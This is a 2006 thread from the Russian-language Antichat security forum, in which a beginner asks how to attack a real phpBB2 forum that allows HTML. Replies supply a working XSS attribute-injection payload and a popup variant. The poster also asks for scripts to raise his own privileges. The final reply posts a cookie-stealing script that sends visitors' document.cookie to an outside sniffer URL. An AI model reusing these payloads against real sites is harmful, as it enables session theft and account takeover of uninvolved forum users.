ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
PHPbb2 нашел форму где html-тэг ON |
18.12.2006, 16:09
|
|
Новичок
Регистрация: 15.12.2006
Сообщений: 9
Провел на форуме:
226414
Репутация:
7
|
|
PHPbb2 нашел форму где html-тэг ON
Вто нашел такой форум, где хтмл тэги включены, как можно сломать?
не бейте сильно, я только учусь  
Последний раз редактировалось mr-troy; 18.12.2006 в 16:14..
Причина: опечатка
|
|
|
18.12.2006, 17:04
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
xss
<pre a='>' onmouseover='alert(/XSS/)' b='<pre' >
|
|
|
|
18.12.2006, 17:08
|
|
Новичок
Регистрация: 15.12.2006
Сообщений: 9
Провел на форуме:
226414
Репутация:
7
|
|
Сообщение от delay(0)
xss
я одном топике ответил данным сообщением, вывелось вот это:
<pre>
а что дальше? можешь в аську стукнуть? или тут написать?
|
|
|
|
18.12.2006, 19:01
|
|
Banned
Регистрация: 28.12.2005
Сообщений: 221
Провел на форуме:
2540519
Репутация:
60
|
|
дай сцылу =)
|
|
|
|
18.12.2006, 20:10
|
|
Новичок
Регистрация: 15.12.2006
Сообщений: 9
Провел на форуме:
226414
Репутация:
7
|
|
гы..я ломать ничего не хочу
просто хочу понять уязвимость. |
|
|
|
18.12.2006, 20:29
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
Провел на форуме:
1948091
Репутация:
1686
|
|
эта уязвимость называется xss -- что расшифоровывается как крос сайт скриптингъъъ -- вообщем можно вставлять --- любой текст -- подумай сам если вставить javascript код -- то браузер его воспримет как код и выполнит --- =) лол
|
|
|
|
18.12.2006, 21:38
|
|
Новичок
Регистрация: 15.12.2006
Сообщений: 9
Провел на форуме:
226414
Репутация:
7
|
|
Сообщение от genom--
эта уязвимость называется xss -- что расшифоровывается как крос сайт скриптингъъъ -- вообщем можно вставлять --- любой текст -- подумай сам если вставить javascript код -- то браузер его воспримет как код и выполнит --- =) лол
ОО спасибо, т.е вместо скрипта XSS могу любой яваскрипт вставить
а чтобы права расширить свои, какие скрипты посоветуете? )
|
|
|
|
18.12.2006, 21:47
|
|
Новичок
Регистрация: 15.12.2006
Сообщений: 9
Провел на форуме:
226414
Репутация:
7
|
|
<pre a='>' onmouseover='alert(/<script language="JavaScript">
WOweb=window.open("ВЗЛОМ/","mr-troy", "width=200, height=143, toolbar=0, location=0, status=0, menubar=0, scrollbars=0, resizable=0,left=1,top=1")
</script>)' b='<pre' >
Вот так работаеть будет? Типа всплывающее окно. |
|
|
|
19.12.2006, 13:08
|
|
Banned
Регистрация: 28.12.2005
Сообщений: 221
Провел на форуме:
2540519
Репутация:
60
|
|
дай фсетаки форум =)
ломать не буим но посмеёмся =))
|
|
|
|
22.12.2006, 10:49
|
|
Участник форума
Регистрация: 19.03.2006
Сообщений: 286
Провел на форуме:
2547059
Репутация:
144
|
|
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
читай статьи про XSS, там описано как что сделать...
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Кинь свой Анекдот
|
TROJ@N |
Болталка |
19 |
02.11.2009 03:53 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
